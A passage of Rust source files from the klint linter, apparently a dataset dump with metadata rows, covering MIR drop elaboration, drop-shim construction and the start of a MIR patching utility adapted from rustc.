    /// Returns the type of `place`, consulting the patch for locals that were
    /// created during elaboration and are not yet part of the body.
    #[instrument(level = "trace", skip(self), ret)]
    fn place_ty(&self, place: Place<'tcx>) -> Ty<'tcx> {
        if place.local < self.elaborator.body().local_decls.next_index() {
            place.ty(self.elaborator.body(), self.tcx()).ty
        } else {
            // We don't have a slice with all the locals, since some are in the patch.
            PlaceTy::from_ty(self.elaborator.patch_ref().local_ty(place.local))
                .multi_projection_ty(self.elaborator.tcx(), place.projection)
                .ty
        }
    }
    /// Shorthand for the elaborator's type context.
    fn tcx(&self) -> TyCtxt<'tcx> {
        self.elaborator.tcx()
    }
    // Generates three blocks:
    // * #1:pin_obj_bb: call Pin<ObjTy>::new_unchecked(&mut obj)
    // * #2:call_drop_bb: fut = call obj.<AsyncDrop::drop>() OR call async_drop_in_place<T>(obj)
    // * #3:drop_term_bb: drop (obj, fut, ...)
    // We keep async drop unexpanded to poll-loop here, to expand it later, at StateTransform -
    // into states expand.
    // call_destructor_only - to call only AsyncDrop::drop, not full async_drop_in_place glue
    fn build_async_drop(
        &mut self,
        place: Place<'tcx>,
        drop_ty: Ty<'tcx>,
        bb: Option<BasicBlock>,
        succ: BasicBlock,
        unwind: Unwind,
        dropline: Option<BasicBlock>,
        call_destructor_only: bool,
    ) -> BasicBlock {
        let tcx = self.tcx();
        let span = self.source_info.span;

        // Reuse `bb` as block #1 when given; otherwise create a placeholder
        // block whose terminator is patched at the very end.
        let pin_obj_bb = bb.unwrap_or_else(|| {
            self.elaborator.patch().new_block(BasicBlockData::new(
                Some(Terminator {
                    // Temporary terminator, will be replaced by patch
                    source_info: self.source_info,
                    kind: TerminatorKind::Return,
                }),
                false,
            ))
        });

        // Resolve the function to call in block #2 and the type of the future
        // it returns.
        let (fut_ty, drop_fn_def_id, trait_args) = if call_destructor_only {
            // Resolving obj.<AsyncDrop::drop>()
            let trait_ref = ty::TraitRef::new(
                tcx,
                tcx.require_lang_item(LangItem::AsyncDrop, span),
                [drop_ty],
            );
            let (drop_trait, trait_args) = match tcx.codegen_select_candidate(
                ty::TypingEnv::fully_monomorphized().as_query_input(trait_ref),
            ) {
                Ok(traits::ImplSource::UserDefined(traits::ImplSourceUserDefinedData {
                    impl_def_id,
                    args,
                    ..
                })) => (*impl_def_id, *args),
                impl_source => {
                    span_bug!(span, "invalid `AsyncDrop` impl_source: {:?}", impl_source);
                }
            };
            // impl_item_refs may be empty if drop fn is not implemented in 'impl AsyncDrop for ...'
            // (#140974).
            // Such code will report error, so just generate sync drop here and return
            let Some(drop_fn_def_id) = tcx
                .associated_item_def_ids(drop_trait)
                .first()
                .and_then(|def_id| {
                    if tcx.def_kind(def_id) == DefKind::AssocFn
                        && tcx.check_args_compatible(*def_id, trait_args)
                    {
                        Some(def_id)
                    } else {
                        None
                    }
                })
                .copied()
            else {
                tcx.dcx().span_delayed_bug(
                    self.elaborator.body().span,
                    "AsyncDrop type without correct `async fn drop(...)`.",
                );
                self.elaborator.patch().patch_terminator(
                    pin_obj_bb,
                    TerminatorKind::Drop {
                        place,
                        target: succ,
                        unwind: unwind.into_action(),
                        replace: false,
                        drop: None,
                        async_fut: None,
                    },
                );
                return pin_obj_bb;
            };
            let drop_fn = Ty::new_fn_def(tcx, drop_fn_def_id, trait_args);
            let sig = drop_fn.fn_sig(tcx);
            let sig = tcx.instantiate_bound_regions_with_erased(sig);
            (sig.output(), drop_fn_def_id, trait_args)
        } else {
            // Resolving async_drop_in_place<T> function for drop_ty
            let drop_fn_def_id = tcx.require_lang_item(LangItem::AsyncDropInPlace, span);
            let trait_args = tcx.mk_args(&[drop_ty.into()]);
            let sig = tcx.fn_sig(drop_fn_def_id).instantiate(tcx, trait_args);
            let sig = tcx.instantiate_bound_regions_with_erased(sig);
            (sig.output(), drop_fn_def_id, trait_args)
        };

        // Temporary holding the drop future produced in block #2.
        let fut = Place::from(self.new_temp(fut_ty));

        // #1:pin_obj_bb >>> obj_ref = &mut obj
        let obj_ref_ty = Ty::new_mut_ref(tcx, tcx.lifetimes.re_erased, drop_ty);
        let obj_ref_place = Place::from(self.new_temp(obj_ref_ty));
        let term_loc = self.elaborator.terminator_loc(pin_obj_bb);
        self.elaborator.patch().add_assign(
            term_loc,
            obj_ref_place,
            Rvalue::Ref(
                tcx.lifetimes.re_erased,
                BorrowKind::Mut {
                    kind: MutBorrowKind::Default,
                },
                place,
            ),
        );

        // pin_obj_place preparation
        let pin_obj_new_unchecked_fn = Ty::new_fn_def(
            tcx,
            tcx.require_lang_item(LangItem::PinNewUnchecked, span),
            [GenericArg::from(obj_ref_ty)],
        );
        let pin_obj_ty = pin_obj_new_unchecked_fn
            .fn_sig(tcx)
            .output()
            .no_bound_vars()
            .unwrap();
        let pin_obj_place = Place::from(self.new_temp(pin_obj_ty));
        let pin_obj_new_unchecked_fn = Operand::Constant(Box::new(ConstOperand {
            span,
            user_ty: None,
            const_: Const::zero_sized(pin_obj_new_unchecked_fn),
        }));

        // #3:drop_term_bb
        let drop_term_bb = self.new_block(
            unwind,
            TerminatorKind::Drop {
                place,
                target: succ,
                unwind: unwind.into_action(),
                replace: false,
                drop: dropline,
                async_fut: Some(fut.local),
            },
        );

        // #2:call_drop_bb
        let mut call_statements = Vec::new();
        let drop_arg = if call_destructor_only {
            pin_obj_place
        } else {
            // `async_drop_in_place` takes a raw pointer: unwrap the `Pin` to
            // its pointee reference and take its address.
            let ty::Adt(adt_def, adt_args) = pin_obj_ty.kind() else {
                bug!();
            };
            let obj_ptr_ty = Ty::new_mut_ptr(tcx, drop_ty);
            let unwrap_ty = adt_def.non_enum_variant().fields[FieldIdx::ZERO].ty(tcx, adt_args);
            let obj_ref_place = Place::from(self.new_temp(unwrap_ty));
            call_statements.push(self.assign(
                obj_ref_place,
                Rvalue::Use(Operand::Copy(tcx.mk_place_field(
                    pin_obj_place,
                    FieldIdx::ZERO,
                    unwrap_ty,
                ))),
            ));
            let obj_ptr_place = Place::from(self.new_temp(obj_ptr_ty));

            let addr = Rvalue::RawPtr(RawPtrKind::Mut, tcx.mk_place_deref(obj_ref_place));
            call_statements.push(self.assign(obj_ptr_place, addr));
            obj_ptr_place
        };
        call_statements.push(Statement::new(
            self.source_info,
            StatementKind::StorageLive(fut.local),
        ));

        let call_drop_bb = self.new_block_with_statements(
            unwind,
            call_statements,
            TerminatorKind::Call {
                func: Operand::function_handle(tcx, drop_fn_def_id, trait_args, span),
                args: [Spanned {
                    node: Operand::Move(drop_arg),
                    span: DUMMY_SP,
                }]
                .into(),
                destination: fut,
                target: Some(drop_term_bb),
                unwind: unwind.into_action(),
                call_source: CallSource::Misc,
                fn_span: self.source_info.span,
            },
        );

        // StorageDead(fut) in self.succ block (at the begin)
        self.elaborator.patch().add_statement(
            Location {
                block: self.succ,
                statement_index: 0,
            },
            StatementKind::StorageDead(fut.local),
        );
        // StorageDead(fut) in unwind block (at the begin)
        if let Unwind::To(block) = unwind {
            self.elaborator.patch().add_statement(
                Location {
                    block,
                    statement_index: 0,
                },
                StatementKind::StorageDead(fut.local),
            );
        }
        // StorageDead(fut) in dropline block (at the begin)
        if let Some(block) = dropline {
            self.elaborator.patch().add_statement(
                Location {
                    block,
                    statement_index: 0,
                },
                StatementKind::StorageDead(fut.local),
            );
        }

        // #1:pin_obj_bb >>> call Pin<ObjTy>::new_unchecked(&mut obj)
        self.elaborator.patch().patch_terminator(
            pin_obj_bb,
            TerminatorKind::Call {
                func: pin_obj_new_unchecked_fn,
                args: [dummy_spanned(Operand::Move(obj_ref_place))].into(),
                destination: pin_obj_place,
                target: Some(call_drop_bb),
                unwind: unwind.into_action(),
                call_source: CallSource::Misc,
                fn_span: span,
            },
        );
        pin_obj_bb
    }
    /// Patches `bb` into the actual drop terminator for `self.place`.
    ///
    /// Emits an async drop (expanded later, at coroutine state transform)
    /// when the body is a coroutine that allows it, `bb` is not a cleanup
    /// block, and the type needs one; otherwise emits a plain synchronous
    /// `Drop` terminator.
    fn build_drop(&mut self, bb: BasicBlock) {
        let drop_ty = self.place_ty(self.place);
        if self.tcx().features().async_drop()
            && self.elaborator.body().coroutine.is_some()
            && self.elaborator.allow_async_drops()
            && !self
                .elaborator
                .patch_ref()
                .block(self.elaborator.body(), bb)
                .is_cleanup
            && drop_ty.needs_async_drop(self.tcx(), self.elaborator.typing_env())
        {
            self.build_async_drop(
                self.place,
                drop_ty,
                Some(bb),
                self.succ,
                self.unwind,
                self.dropline,
                false,
            );
        } else {
            self.elaborator.patch().patch_terminator(
                bb,
                TerminatorKind::Drop {
                    place: self.place,
                    target: self.succ,
                    unwind: self.unwind.into_action(),
                    replace: false,
                    drop: None,
                    async_fut: None,
                },
            );
        }
    }
/// This elaborates a single drop instruction, located at `bb`, and
/// patches over it.
///
/// The elaborated drop checks the drop flags to only drop what
/// is initialized.
///
/// In addition, the relevant drop flags also need to be cleared
/// to avoid double-drops. However, in the middle of a complex
/// drop, one must avoid clearing some of the flags before they
/// are read, as that would cause a memory leak.
///
/// In particular, when dropping an ADT, multiple fields may be
/// joined together under the `rest` subpath. They are all controlled
/// by the primary drop flag, but only the last rest-field dropped
/// should clear it (and it must also not clear anything else).
//
// FIXME: I think we should just control the flags externally,
// and then we do not need this machinery.
#[instrument(level = "debug")]
fn elaborate_drop(&mut self, bb: BasicBlock) {
match self.elaborator.drop_style(self.path, DropFlagMode::Deep) {
DropStyle::Dead => {
self.elaborator
.patch()
.patch_terminator(bb, TerminatorKind::Goto { target: self.succ });
}
DropStyle::Static => {
self.build_drop(bb);
}
DropStyle::Conditional => {
let drop_bb = self.complete_drop(self.succ, self.unwind);
self.elaborator
.patch()
.patch_terminator(bb, TerminatorKind::Goto { target: drop_bb });
}
DropStyle::Open => {
let drop_bb = self.open_drop();
self.elaborator
.patch()
.patch_terminator(bb, TerminatorKind::Goto { target: drop_bb });
}
}
}
/// Returns the place and move path for each field of `variant`,
/// (the move path is `None` if the field is a rest field).
    fn move_paths_for_fields(
        &self,
        base_place: Place<'tcx>,
        variant_path: D::Path,
        variant: &'tcx ty::VariantDef,
        args: GenericArgsRef<'tcx>,
    ) -> Vec<(Place<'tcx>, Option<D::Path>)> {
        variant
            .fields
            .iter_enumerated()
            .map(|(field_idx, field)| {
                let subpath = self.elaborator.field_subpath(variant_path, field_idx);
                let tcx = self.tcx();

                // Field types are normalized in the elaborator's typing env,
                // which must be in post-analysis mode for this to be valid.
                assert_eq!(
                    self.elaborator.typing_env().typing_mode,
                    ty::TypingMode::PostAnalysis
                );
                let field_ty = match tcx.try_normalize_erasing_regions(
                    self.elaborator.typing_env(),
                    field.ty(tcx, args),
                ) {
                    Ok(t) => t,
                    // Normalization failure here indicates a bug elsewhere;
                    // surface it as a delayed bug plus an error type rather
                    // than panicking outright.
                    Err(_) => Ty::new_error(
                        self.tcx(),
                        self.tcx().dcx().span_delayed_bug(
                            self.elaborator.body().span,
                            "Error normalizing in drop elaboration.",
                        ),
                    ),
                };
                (tcx.mk_place_field(base_place, field_idx, field_ty), subpath)
            })
            .collect()
    }
    /// Builds the drop for a single field/element of the value being
    /// dropped, returning the block that performs it.
    ///
    /// Fields with their own move path are elaborated recursively; "rest"
    /// fields (no dedicated subpath) are dropped conditioned on the parent's
    /// drop flag instead (see the inline comment below).
    fn drop_subpath(
        &mut self,
        place: Place<'tcx>,
        path: Option<D::Path>,
        succ: BasicBlock,
        unwind: Unwind,
        dropline: Option<BasicBlock>,
    ) -> BasicBlock {
        if let Some(path) = path {
            debug!("drop_subpath: for std field {:?}", place);

            DropCtxt {
                elaborator: self.elaborator,
                source_info: self.source_info,
                path,
                place,
                succ,
                unwind,
                dropline,
            }
            .elaborated_drop_block()
        } else {
            debug!("drop_subpath: for rest field {:?}", place);

            DropCtxt {
                elaborator: self.elaborator,
                source_info: self.source_info,
                place,
                succ,
                unwind,
                dropline,
                // Using `self.path` here to condition the drop on
                // our own drop flag.
                path: self.path,
            }
            .complete_drop(succ, unwind)
        }
    }
/// Creates one-half of the drop ladder for a list of fields, and return
/// the list of steps in it in reverse order, with the first step
/// dropping 0 fields and so on.
///
/// `unwind_ladder` is such a list of steps in reverse order,
/// which is called if the matching step of the drop glue panics.
///
/// `dropline_ladder` is a similar list of steps in reverse order,
/// which is called if the matching step of the drop glue will contain async drop
/// (expanded later to Yield) and the containing coroutine will be dropped at this point.
    fn drop_halfladder(
        &mut self,
        unwind_ladder: &[Unwind],
        dropline_ladder: &[Option<BasicBlock>],
        mut succ: BasicBlock,
        fields: &[(Place<'tcx>, Option<D::Path>)],
    ) -> Vec<BasicBlock> {
        // Build the ladder from the last field backwards: each step drops one
        // more field and then continues to the previously built step.
        iter::once(succ)
            .chain(
                itertools::izip!(fields.iter().rev(), unwind_ladder, dropline_ladder).map(
                    |(&(place, path), &unwind_succ, &dropline_to)| {
                        succ = self.drop_subpath(place, path, succ, unwind_succ, dropline_to);
                        succ
                    },
                ),
            )
            .collect()
    }
    /// Builds the common tail of a drop ladder: a block that clears the
    /// "master" drop flag and then continues to `self.succ`.
    fn drop_ladder_bottom(&mut self) -> (BasicBlock, Unwind, Option<BasicBlock>) {
        // Clear the "master" drop flag at the end. This is needed
        // because the "master" drop protects the ADT's discriminant,
        // which is invalidated after the ADT is dropped.
        (
            self.drop_flag_reset_block(DropFlagMode::Shallow, self.succ, self.unwind),
            self.unwind,
            self.dropline,
        )
    }
/// Creates a full drop ladder, consisting of 2 connected half-drop-ladders
///
/// For example, with 3 fields, the drop ladder is
///
/// ```text
/// .d0:
/// ELAB(drop location.0 [target=.d1, unwind=.c1])
/// .d1:
/// ELAB(drop location.1 [target=.d2, unwind=.c2])
/// .d2:
/// ELAB(drop location.2 [target=`self.succ`, unwind=`self.unwind`])
/// .c1:
/// ELAB(drop location.1 [target=.c2])
/// .c2:
/// ELAB(drop location.2 [target=`self.unwind`])
/// ```
///
/// For possible-async drops in coroutines we also need dropline ladder
/// ```text
/// .d0 (mainline):
/// ELAB(drop location.0 [target=.d1, unwind=.c1, drop=.e1])
/// .d1 (mainline):
/// ELAB(drop location.1 [target=.d2, unwind=.c2, drop=.e2])
/// .d2 (mainline):
/// ELAB(drop location.2 [target=`self.succ`, unwind=`self.unwind`, drop=`self.drop`])
/// .c1 (unwind):
/// ELAB(drop location.1 [target=.c2])
/// .c2 (unwind):
/// ELAB(drop location.2 [target=`self.unwind`])
/// .e1 (dropline):
/// ELAB(drop location.1 [target=.e2, unwind=.c2])
/// .e2 (dropline):
/// ELAB(drop location.2 [target=`self.drop`, unwind=`self.unwind`])
/// ```
///
/// NOTE: this does not clear the master drop flag, so you need
/// to point succ/unwind on a `drop_ladder_bottom`.
fn drop_ladder(
&mut self,
fields: Vec<(Place<'tcx>, Option<D::Path>)>,
succ: BasicBlock,
unwind: Unwind,
dropline: Option<BasicBlock>,
) -> (BasicBlock, Unwind, Option<BasicBlock>) {
debug!("drop_ladder({:?}, {:?})", self, fields);
assert!(
if unwind.is_cleanup() {
dropline.is_none()
} else {
true
},
"Dropline is set for cleanup drop ladder"
);
let mut fields = fields;
fields.retain(|&(place, _)| {
self.place_ty(place)
.needs_drop(self.tcx(), self.elaborator.typing_env())
});
debug!("drop_ladder - fields needing drop: {:?}", fields);
let dropline_ladder: Vec<Option<BasicBlock>> = vec![None; fields.len() + 1];
let unwind_ladder = vec![Unwind::InCleanup; fields.len() + 1];
let unwind_ladder: Vec<_> = if let Unwind::To(target) = unwind {
let halfladder =
self.drop_halfladder(&unwind_ladder, &dropline_ladder, target, &fields);
halfladder.into_iter().map(Unwind::To).collect()
} else {
unwind_ladder
};
let dropline_ladder: Vec<_> = if let Some(succ) = dropline {
let halfladder = self.drop_halfladder(&unwind_ladder, &dropline_ladder, succ, &fields);
halfladder.into_iter().map(Some).collect()
} else {
dropline_ladder
};
let normal_ladder = self.drop_halfladder(&unwind_ladder, &dropline_ladder, succ, &fields);
(
*normal_ladder.last().unwrap(),
*unwind_ladder.last().unwrap(),
*dropline_ladder.last().unwrap(),
)
}
    /// Builds an "open" drop for a tuple: each element is dropped in turn
    /// via a drop ladder.
    fn open_drop_for_tuple(&mut self, tys: &[Ty<'tcx>]) -> BasicBlock {
        debug!("open_drop_for_tuple({:?}, {:?})", self, tys);

        let fields = tys
            .iter()
            .enumerate()
            .map(|(i, &ty)| {
                (
                    self.tcx().mk_place_field(self.place, FieldIdx::new(i), ty),
                    self.elaborator.field_subpath(self.path, FieldIdx::new(i)),
                )
            })
            .collect();

        let (succ, unwind, dropline) = self.drop_ladder_bottom();
        self.drop_ladder(fields, succ, unwind, dropline).0
    }
    /// Drops the T contained in a `Box<T>` if it has not been moved out of
    #[instrument(level = "debug", ret)]
    fn open_drop_for_box_contents(
        &mut self,
        adt: ty::AdtDef<'tcx>,
        args: GenericArgsRef<'tcx>,
        succ: BasicBlock,
        unwind: Unwind,
        dropline: Option<BasicBlock>,
    ) -> BasicBlock {
        // drop glue is sent straight to codegen
        // box cannot be directly dereferenced
        //
        // Instead, dig through the box's first fields (per the names below,
        // `Unique` then `NonNull`), transmute the pointer to a raw `*const T`
        // and drop through a dereference of that.
        let unique_ty = adt.non_enum_variant().fields[FieldIdx::ZERO].ty(self.tcx(), args);
        let unique_variant = unique_ty.ty_adt_def().unwrap().non_enum_variant();
        let nonnull_ty = unique_variant.fields[FieldIdx::ZERO].ty(self.tcx(), args);
        let ptr_ty = Ty::new_imm_ptr(self.tcx(), args[0].expect_ty());

        let unique_place = self
            .tcx()
            .mk_place_field(self.place, FieldIdx::ZERO, unique_ty);
        let nonnull_place = self
            .tcx()
            .mk_place_field(unique_place, FieldIdx::ZERO, nonnull_ty);

        let ptr_local = self.new_temp(ptr_ty);

        let interior = self.tcx().mk_place_deref(Place::from(ptr_local));
        let interior_path = self.elaborator.deref_subpath(self.path);

        let do_drop_bb = self.drop_subpath(interior, interior_path, succ, unwind, dropline);

        let setup_bbd = BasicBlockData::new_stmts(
            vec![self.assign(
                Place::from(ptr_local),
                Rvalue::Cast(CastKind::Transmute, Operand::Copy(nonnull_place), ptr_ty),
            )],
            Some(Terminator {
                kind: TerminatorKind::Goto { target: do_drop_bb },
                source_info: self.source_info,
            }),
            unwind.is_cleanup(),
        );
        self.elaborator.patch().new_block(setup_bbd)
    }
    /// Builds an "open" drop for a struct/enum/union: drops the contents
    /// (unless skipped), then runs the destructor if the ADT has one.
    #[instrument(level = "debug", ret)]
    fn open_drop_for_adt(
        &mut self,
        adt: ty::AdtDef<'tcx>,
        args: GenericArgsRef<'tcx>,
    ) -> BasicBlock {
        // An ADT with no variants can never be instantiated, so dropping one
        // is unreachable.
        if adt.variants().is_empty() {
            return self.elaborator.patch().new_block(BasicBlockData::new(
                Some(Terminator {
                    source_info: self.source_info,
                    kind: TerminatorKind::Unreachable,
                }),
                self.unwind.is_cleanup(),
            ));
        }

        // Unions and `ManuallyDrop` never drop their contents.
        let skip_contents = adt.is_union() || adt.is_manually_drop();
        let contents_drop = if skip_contents {
            if adt.has_dtor(self.tcx()) && self.elaborator.get_drop_flag(self.path).is_some() {
                // the top-level drop flag is usually cleared by open_drop_for_adt_contents
                // types with destructors would still need an empty drop ladder to clear it
                //
                // however, these types are only open dropped in `DropShimElaborator`
                // which does not have drop flags
                // a future box-like "DerefMove" trait would allow for this case to happen
                span_bug!(self.source_info.span, "open dropping partially moved union");
            }

            (self.succ, self.unwind, self.dropline)
        } else {
            self.open_drop_for_adt_contents(adt, args)
        };

        if adt.has_dtor(self.tcx()) {
            let destructor_block = if adt.is_box() {
                // we need to drop the inside of the box before running the destructor
                let succ = self.destructor_call_block_sync((contents_drop.0, contents_drop.1));
                let unwind = contents_drop
                    .1
                    .map(|unwind| self.destructor_call_block_sync((unwind, Unwind::InCleanup)));
                let dropline = contents_drop
                    .2
                    .map(|dropline| self.destructor_call_block_sync((dropline, contents_drop.1)));
                self.open_drop_for_box_contents(adt, args, succ, unwind, dropline)
            } else {
                self.destructor_call_block(contents_drop)
            };

            self.drop_flag_test_block(destructor_block, contents_drop.0, contents_drop.1)
        } else {
            contents_drop.0
        }
    }
fn open_drop_for_adt_contents(
&mut self,
adt: ty::AdtDef<'tcx>,
args: GenericArgsRef<'tcx>,
) -> (BasicBlock, Unwind, Option<BasicBlock>) {
let (succ, unwind, dropline) = self.drop_ladder_bottom();
if !adt.is_enum() {
let fields =
self.move_paths_for_fields(self.place, self.path, adt.variant(FIRST_VARIANT), args);
self.drop_ladder(fields, succ, unwind, dropline)
} else {
self.open_drop_for_multivariant(adt, args, succ, unwind, dropline)
}
}
fn open_drop_for_multivariant(
&mut self,
adt: ty::AdtDef<'tcx>,
args: GenericArgsRef<'tcx>,
succ: BasicBlock,
unwind: Unwind,
dropline: Option<BasicBlock>,
) -> (BasicBlock, Unwind, Option<BasicBlock>) {
let mut values = Vec::with_capacity(adt.variants().len());
let mut normal_blocks = Vec::with_capacity(adt.variants().len());
let mut unwind_blocks = if unwind.is_cleanup() {
None
} else {
Some(Vec::with_capacity(adt.variants().len()))
};
let mut dropline_blocks = if dropline.is_none() {
None
} else {
Some(Vec::with_capacity(adt.variants().len()))
};
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | true |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/mir/drop_shim.rs | src/mir/drop_shim.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
// From rustc_mir_transform/src/shim.rs
// Adopted to support polymorphic drop shims
use rustc_abi::{FieldIdx, VariantIdx};
use rustc_hir::def_id::DefId;
use rustc_index::{Idx, IndexVec};
use rustc_middle::mir::*;
use rustc_middle::ty::{self, EarlyBinder, Ty, TyCtxt, TypingEnv};
use rustc_span::Span;
use std::{fmt, iter};
use super::elaborate_drop::{self, *};
use super::patch::MirPatch;
use crate::ctxt::AnalysisCtxt;
fn local_decls_for_sig<'tcx>(
sig: &ty::FnSig<'tcx>,
span: Span,
) -> IndexVec<Local, LocalDecl<'tcx>> {
iter::once(LocalDecl::new(sig.output(), span))
.chain(
sig.inputs()
.iter()
.map(|ity| LocalDecl::new(*ity, span).immutable()),
)
.collect()
}
#[instrument(skip(cx))]
pub fn build_drop_shim<'tcx>(
cx: &AnalysisCtxt<'tcx>,
def_id: DefId,
typing_env: TypingEnv<'tcx>,
ty: Ty<'tcx>,
) -> Body<'tcx> {
if let ty::Coroutine(gen_def_id, args) = ty.kind() {
let body = cx.analysis_mir(*gen_def_id).coroutine_drop().unwrap();
let body = EarlyBinder::bind(body.clone()).instantiate(cx.tcx, args);
return body;
}
let args = cx.mk_args(&[ty.into()]);
let sig = cx.fn_sig(def_id).instantiate(cx.tcx, args);
let sig = cx.instantiate_bound_regions_with_erased(sig);
let span = cx.def_span(def_id);
let source_info = SourceInfo::outermost(span);
let return_block = BasicBlock::new(1);
let mut blocks = IndexVec::with_capacity(2);
let block = |blocks: &mut IndexVec<_, _>, kind| {
blocks.push(BasicBlockData::new(
Some(Terminator { source_info, kind }),
false,
))
};
block(
&mut blocks,
TerminatorKind::Goto {
target: return_block,
},
);
block(&mut blocks, TerminatorKind::Return);
let source = MirSource::from_instance(ty::InstanceKind::DropGlue(def_id, Some(ty)));
let mut body = new_body(
source,
blocks,
local_decls_for_sig(&sig, span),
sig.inputs().len(),
span,
);
// The first argument (index 0), but add 1 for the return value.
let dropee_ptr = Place::from(Local::new(1 + 0));
let patch = {
let mut elaborator = DropShimElaborator {
body: &body,
patch: MirPatch::new(&body),
tcx: cx.tcx,
typing_env,
produce_async_drops: false,
};
let dropee = cx.mk_place_deref(dropee_ptr);
let resume_block = elaborator.patch.resume_block();
elaborate_drop::elaborate_drop(
&mut elaborator,
source_info,
dropee,
(),
return_block,
elaborate_drop::Unwind::To(resume_block),
START_BLOCK,
None,
);
elaborator.patch
};
patch.apply(&mut body);
body
}
fn new_body<'tcx>(
source: MirSource<'tcx>,
basic_blocks: IndexVec<BasicBlock, BasicBlockData<'tcx>>,
local_decls: IndexVec<Local, LocalDecl<'tcx>>,
arg_count: usize,
span: Span,
) -> Body<'tcx> {
let mut body = Body::new(
source,
basic_blocks,
IndexVec::from_elem_n(
SourceScopeData {
span,
parent_scope: None,
inlined: None,
inlined_parent_scope: None,
local_data: ClearCrossCrate::Clear,
},
1,
),
local_decls,
IndexVec::new(),
arg_count,
vec![],
span,
None,
// FIXME(compiler-errors): is this correct?
None,
);
body.set_required_consts(Vec::new());
body
}
pub struct DropShimElaborator<'a, 'tcx> {
pub body: &'a Body<'tcx>,
pub patch: MirPatch<'tcx>,
pub tcx: TyCtxt<'tcx>,
pub typing_env: ty::TypingEnv<'tcx>,
pub produce_async_drops: bool,
}
impl fmt::Debug for DropShimElaborator<'_, '_> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> Result<(), fmt::Error> {
f.debug_struct("DropShimElaborator").finish_non_exhaustive()
}
}
impl<'a, 'tcx> DropElaborator<'a, 'tcx> for DropShimElaborator<'a, 'tcx> {
type Path = ();
fn patch_ref(&self) -> &MirPatch<'tcx> {
&self.patch
}
fn patch(&mut self) -> &mut MirPatch<'tcx> {
&mut self.patch
}
fn body(&self) -> &'a Body<'tcx> {
self.body
}
fn tcx(&self) -> TyCtxt<'tcx> {
self.tcx
}
fn typing_env(&self) -> ty::TypingEnv<'tcx> {
self.typing_env
}
fn terminator_loc(&self, bb: BasicBlock) -> Location {
self.patch.terminator_loc(self.body, bb)
}
fn allow_async_drops(&self) -> bool {
self.produce_async_drops
}
fn drop_style(&self, _path: Self::Path, mode: DropFlagMode) -> DropStyle {
match mode {
DropFlagMode::Shallow => {
// Drops for the contained fields are "shallow" and "static" - they will simply call
// the field's own drop glue.
DropStyle::Static
}
DropFlagMode::Deep => {
// The top-level drop is "deep" and "open" - it will be elaborated to a drop ladder
// dropping each field contained in the value.
DropStyle::Open
}
}
}
fn get_drop_flag(&mut self, _path: Self::Path) -> Option<Operand<'tcx>> {
None
}
fn clear_drop_flag(&mut self, _location: Location, _path: Self::Path, _mode: DropFlagMode) {}
fn field_subpath(&self, _path: Self::Path, _field: FieldIdx) -> Option<Self::Path> {
None
}
fn deref_subpath(&self, _path: Self::Path) -> Option<Self::Path> {
None
}
fn downcast_subpath(&self, _path: Self::Path, _variant: VariantIdx) -> Option<Self::Path> {
Some(())
}
fn array_subpath(&self, _path: Self::Path, _index: u64, _size: u64) -> Option<Self::Path> {
None
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/mir/patch.rs | src/mir/patch.rs | #![allow(dead_code)]
// From rustc_mir_transform/src/patch.rs
// Needed because they're `pub(crate)`
use rustc_index::{Idx, IndexVec};
use rustc_middle::mir::*;
use rustc_middle::ty::Ty;
use rustc_span::Span;
use tracing::debug;
/// This struct lets you "patch" a MIR body, i.e. modify it. You can queue up
/// various changes, such as the addition of new statements and basic blocks
/// and replacement of terminators, and then apply the queued changes all at
/// once with `apply`. This is useful for MIR transformation passes.
pub(crate) struct MirPatch<'tcx> {
term_patch_map: IndexVec<BasicBlock, Option<TerminatorKind<'tcx>>>,
new_blocks: Vec<BasicBlockData<'tcx>>,
new_statements: Vec<(Location, StatementKind<'tcx>)>,
new_locals: Vec<LocalDecl<'tcx>>,
resume_block: Option<BasicBlock>,
// Only for unreachable in cleanup path.
unreachable_cleanup_block: Option<BasicBlock>,
// Only for unreachable not in cleanup path.
unreachable_no_cleanup_block: Option<BasicBlock>,
// Cached block for UnwindTerminate (with reason)
terminate_block: Option<(BasicBlock, UnwindTerminateReason)>,
body_span: Span,
next_local: usize,
}
impl<'tcx> MirPatch<'tcx> {
/// Creates a new, empty patch.
pub(crate) fn new(body: &Body<'tcx>) -> Self {
let mut result = MirPatch {
term_patch_map: IndexVec::from_elem(None, &body.basic_blocks),
new_blocks: vec![],
new_statements: vec![],
new_locals: vec![],
next_local: body.local_decls.len(),
resume_block: None,
unreachable_cleanup_block: None,
unreachable_no_cleanup_block: None,
terminate_block: None,
body_span: body.span,
};
for (bb, block) in body.basic_blocks.iter_enumerated() {
// Check if we already have a resume block
if matches!(block.terminator().kind, TerminatorKind::UnwindResume)
&& block.statements.is_empty()
{
result.resume_block = Some(bb);
continue;
}
// Check if we already have an unreachable block
if matches!(block.terminator().kind, TerminatorKind::Unreachable)
&& block.statements.is_empty()
{
if block.is_cleanup {
result.unreachable_cleanup_block = Some(bb);
} else {
result.unreachable_no_cleanup_block = Some(bb);
}
continue;
}
// Check if we already have a terminate block
if let TerminatorKind::UnwindTerminate(reason) = block.terminator().kind
&& block.statements.is_empty()
{
result.terminate_block = Some((bb, reason));
continue;
}
}
result
}
pub(crate) fn resume_block(&mut self) -> BasicBlock {
if let Some(bb) = self.resume_block {
return bb;
}
let bb = self.new_block(BasicBlockData::new(
Some(Terminator {
source_info: SourceInfo::outermost(self.body_span),
kind: TerminatorKind::UnwindResume,
}),
true,
));
self.resume_block = Some(bb);
bb
}
pub(crate) fn unreachable_cleanup_block(&mut self) -> BasicBlock {
if let Some(bb) = self.unreachable_cleanup_block {
return bb;
}
let bb = self.new_block(BasicBlockData::new(
Some(Terminator {
source_info: SourceInfo::outermost(self.body_span),
kind: TerminatorKind::Unreachable,
}),
true,
));
self.unreachable_cleanup_block = Some(bb);
bb
}
pub(crate) fn unreachable_no_cleanup_block(&mut self) -> BasicBlock {
if let Some(bb) = self.unreachable_no_cleanup_block {
return bb;
}
let bb = self.new_block(BasicBlockData::new(
Some(Terminator {
